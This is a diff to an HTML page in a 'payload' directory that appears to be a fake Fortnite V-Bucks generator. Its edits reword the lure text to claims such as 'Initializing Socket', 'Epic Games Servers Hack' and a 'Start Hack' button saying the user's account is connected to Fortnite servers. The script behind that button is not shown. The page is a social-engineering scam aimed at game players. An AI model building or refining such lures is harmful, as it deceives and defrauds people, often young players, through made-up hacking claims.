--- a/payload/vbucks/src/index.html
+++ b/payload/vbucks/src/index.html
@@ -87,7 +87,7 @@
                      </div>
                      <div class="fortnite-progress-wrap" style="display: none;">
                         <div class="fortnite-progress  center-block" style="width: 70%; text-align: center; position: relative;">
-                           <p class="progress-title" style="font-family: fortnite; font-size: 25px; text-transform: uppercase;">Generate V-bucks</p>
+                           <p class="progress-title" style="font-family: fortnite; font-size: 25px; text-transform: uppercase;">Initializing Socket</p>
                            <p  id="fortnite-progress-text">Generator will modify your account</p>
                            <div class="progress">
                               <div class="progress-bar   active g-progressbar" role="progressbar" style="width: 20%"></div>
@@ -99,10 +99,10 @@
                      <div class="col-lg-12 verification-wrap" style="display: none;">
                         <div class="verification col-sm-7 col-xs-9 center-block">
                            <div class="header-wrap">
-                              <h4 style="font-family: fortnite; font-size: 25px; text-transform: uppercase;">Epic Games Hack</h4>
+                              <h4 style="font-family: fortnite; font-size: 25px; text-transform: uppercase;">Epic Games Servers Hack</h4>
                            </div>
                            <div class="content-ver">
-                              <p><span id="user-text2"></span> has been connected to the Epic Games Fortnite servers. Click 'Finish Hack' to add your V-Bucks.</p>
+                              <p><span id="user-text2"></span> has been connected to the Epic Games Fortnite servers. Click 'Start Hack' to add your V-Bucks.</p>
                               <div class="verify-btn center-block text-center">
                                  <div class="verify-btn-text">
                                     <a onclick="start_hack();" href="" style="font-family: fortnite; font-size: 22px; text-transform: uppercase; color: black;">Start Hack</a>
@@ -115,8 +115,7 @@
                         <div class="col-lg-12 sticky-alert">
                            <p style="font-family: fortnite; font-size: 25px; margin-bottom: 0px;">LIVE ACTIVITY</p>
                            <p></p>
-                           <div id="fortnite-sticky" class="fortnite-sticky">
-                           </div>
+
                         </div>
                      </div>
                   </div>
